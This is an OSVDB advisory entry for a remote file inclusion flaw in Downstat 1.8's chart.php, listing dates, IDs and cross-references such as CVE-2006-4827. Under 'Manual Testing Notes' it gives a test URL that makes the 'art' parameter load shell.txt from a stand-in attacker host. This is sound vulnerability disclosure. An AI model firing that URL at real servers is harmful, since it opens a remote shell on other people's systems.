Downstat chart.php art Variable Remote File Inclusion

2006-09-13T09:18:59
ID OSVDB:28780
Type osvdb
Reporter OSVDB
Modified 2006-09-13T09:18:59

Description

Manual Testing Notes

http://[target]/downstat1.8/chart.php?art=http://[attacker]/shell.txt?

References:

Secunia Advisory ID:21914 Generic Exploit URL: http://milw0rm.com/exploits/2359 FrSIRT Advisory: ADV-2006-3594 CVE-2006-4827 Bugtraq ID: 20007